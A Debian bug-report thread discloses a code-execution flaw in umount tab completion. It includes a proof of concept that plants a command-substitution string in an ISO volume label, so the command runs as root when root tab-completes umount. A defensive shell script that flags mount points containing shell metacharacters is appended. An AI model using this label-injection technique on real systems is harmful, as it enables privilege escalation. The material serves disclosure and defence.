Bug#892179: code execution in bash-completion for umount

2018-03-06 Thread Salvatore Bonaccorso
Control: reassign -1 src:util-linux 2.29.2-1
Control: tags -1 + upstream fixed-upstream

Hi Björn

Thanks for reporting the issue!

On Tue, Mar 06, 2018 at 02:44:39PM +0100, Björn Bosselmann wrote:
> Package: bash-completion
> Version: 1:2.1-4.3
> Severity: grave
> Tags: security
> 
> Hi,
> 
> when bash-completion is installed, it uses
> /usr/share/bash-completion/completions/umount from umount package to
> provide autocompletion. This script does not escape mount paths
> correctly, so it allows a local user with rights to mount filesystems to
> execute commands in the context of the umount user (probably root).
> Unprivileged users can mount filesystems with custom mountpoints using
> udisks2, FUSE or with the help of desktop environments.

The umount completion is actually provided by util-linux (since 2.28-1
where it took over from bash-completion itself). I'm thus reassigning
it to src:util-linux. Then if the issue is present as well in
bash-completion earlier than 1:2.1-4.3, then 1:2.1-4.3 removed the
completion and would not be affected in the resulting binary packages
(source still might be).

Regards,
Salvatore



Bug#892179: code execution in bash-completion for umount

2018-03-06 Thread Björn Bosselmann
Package: bash-completion
Version: 1:2.1-4.3
Severity: grave
Tags: security

Hi,

when bash-completion is installed, it uses
/usr/share/bash-completion/completions/umount from umount package to
provide autocompletion. This script does not escape mount paths
correctly, so it allows a local user with rights to mount filesystems to
execute commands in the context of the umount user (probably root).
Unprivileged users can mount filesystems with custom mountpoints using
udisks2, FUSE or with the help of desktop environments.

Example:

as regular user:
--
$ mkdir empty

$ genisoimage -o test.iso -V '$(IFS=":";cmd="touch:foo";$cmd)' empty
I: -input-charset not specified, using utf-8 (detected in locale settings)
Total translation table size: 0
Total rockridge attributes bytes: 0
Total directory bytes: 0
Path table size(bytes): 10
Max brk space used 0
174 extents written (0 MB)

$ udisksctl loop-setup -f test.iso
Mapped file test.iso as /dev/loop0.

(if not mounted by automounter already)
$ udisksctl mount -b /dev/loop0
Mounted /dev/loop0 at /media/user/$(IFS=":";cmd="touch:foo";$cmd).
--

as different user or even root:
--
# ls -la
total 28
drwxr-xr-x  2 root root  4096 Feb 14 10:00 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..

# umount  ^C

# ls -la
total 28
drwxr-xr-x  2 root root  4096 Feb 14 10:01 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..
-rw-r--r--  1 root root 0 Feb 14 10:01 foo
--

I tested it using latest Debian GNU/Linux 9.3 (stretch) using default
installation with desktop environment.
Involved packages:
mount 2.29.2-1
bash 4.4-5
bash-completion 1:2.1-4.3
genisoimage 9:1.1.11-3+b2
udisks2 2.1.8-1

uname -a
Linux id382 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02)
x86_64 GNU/Linux

It seems to be fixed in upstream util-linux already because of a similar
bugfix:
https://github.com/karelzak/util-linux/commit/75f03badd7ed9f1dd951863d75e756883d3acc55#diff-a47601b5dbce9dc06c3af1deb02758c7

Björn Bosselmann
G DATA Software AG


-- System Information:
Debian Release: 9.3
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.9.0-6-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8),
LANGUAGE= (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages bash-completion depends on:
ii  bash  4.4-5
ii  dpkg  1.18.24

bash-completion recommends no packages.

bash-completion suggests no packages.

-- no debconf information
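
The report above depends on a mount point whose name contains shell syntax. As an added example (not part of the original report and not util-linux code), the following check lists mount points containing characters a shell would interpret if the path were expanded unquoted. The function names, the character list and the sample mountinfo lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Field 5 of each /proc/self/mountinfo line is the mount point. The kernel
# octal-escapes space, tab, newline and backslash there, but leaves
# characters such as $ ( ) ; " and ` untouched.

# Print every mount point (one per line) that contains a shell metacharacter.
# Optional argument: a mountinfo-format file (default: the live mount table).
suspicious_mountpoints() (
    src="${1:-/proc/self/mountinfo}"
    while read -r _id _parent _dev _root mnt _rest; do
        case "$mnt" in
            *'$'*|*'`'*|*';'*|*'|'*|*'&'*|*'('*|*')'*|*'<'*|*'>'*|*'"'*|*"'"*)
                printf '%s\n' "$mnt" ;;
        esac
    done < "$src"
)

# Write constructed sample data: a root filesystem, the mount point from the
# report, and a harmless mount point whose space is escaped as \040.
write_sample_mountinfo() {
    cat > "$1" <<'EOF'
22 1 8:1 / / rw,relatime shared:1 - ext4 /dev/sda1 rw
45 22 7:0 / /media/user/$(IFS=":";cmd="touch:foo";$cmd) ro,nosuid,nodev shared:30 - iso9660 /dev/loop0 ro
46 22 8:17 / /media/user/USB\040STICK rw,nosuid,nodev shared:31 - vfat /dev/sdb1 rw
EOF
}

# Demo on the constructed sample; only the second entry is reported.
sample=$(mktemp)
write_sample_mountinfo "$sample"
suspicious_mountpoints "$sample"
rm -f "$sample"
```

Called without an argument, suspicious_mountpoints reads the live mount table, which makes it usable as a periodic check on hosts where unprivileged users can mount removable media.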





